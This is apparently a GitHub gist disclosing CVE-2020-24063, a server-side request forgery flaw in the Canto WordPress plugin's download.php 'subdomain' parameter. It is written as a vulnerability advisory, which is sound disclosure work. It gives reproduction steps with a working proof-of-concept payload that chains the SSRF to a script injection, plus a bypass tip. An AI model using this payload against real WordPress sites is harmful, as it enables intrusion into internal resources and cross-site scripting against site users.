Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
SSRF in Canto Plugin for Wordpress (CVE-2020-24063)
#Description
The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF.
"subdomain" parameter in Canto WordPress Plugin is vulnerable to
Server-Side Request Forgery (SSRF) which allows an attacker to make a
request to an internal or external server & retrieve content hosted on
the server. Due to this, an attacker can perform attacks such as
Cross-Site Scripting, Cross-Site Port Attack, abuse Cross-Origin
resource sharing, or access internal resources hosted on the server.
#Reference: CVE-2020-24063
#Steps to Reproduce:
1. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/download.php?subdomain="
2. Add following payload "xss-game.appspot.com/level1/frame?query=<script>alert(document.domain)</script>?" to "subdomain=" parameter.
3. Observe the XSS is executed.
Please Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment